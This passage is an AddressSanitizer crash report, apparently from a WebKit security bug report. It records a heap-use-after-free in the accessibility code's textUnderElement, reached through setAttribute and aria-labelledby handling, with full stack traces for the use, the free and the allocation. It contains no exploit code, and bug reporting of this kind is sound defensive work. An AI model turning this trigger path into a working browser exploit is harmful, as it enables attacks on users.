#0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)
#1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
#12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#20 0x279e6e001027 (<unknown module>)
#21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
#34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
#35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
#36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
#37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)
freed by thread T0 here:
#0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)
#3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)
#4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)
#5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)
#6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)
#7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)
#8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)
#9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)
#10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
#11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)
#14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)
#15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)
#16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)
#17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)
#18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)
#19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
previously allocated by thread T0 here:
#0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)
#7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)
#8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)
#9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)
#10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)
#11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
#22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const
Shadow bytes around the buggy address:
0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
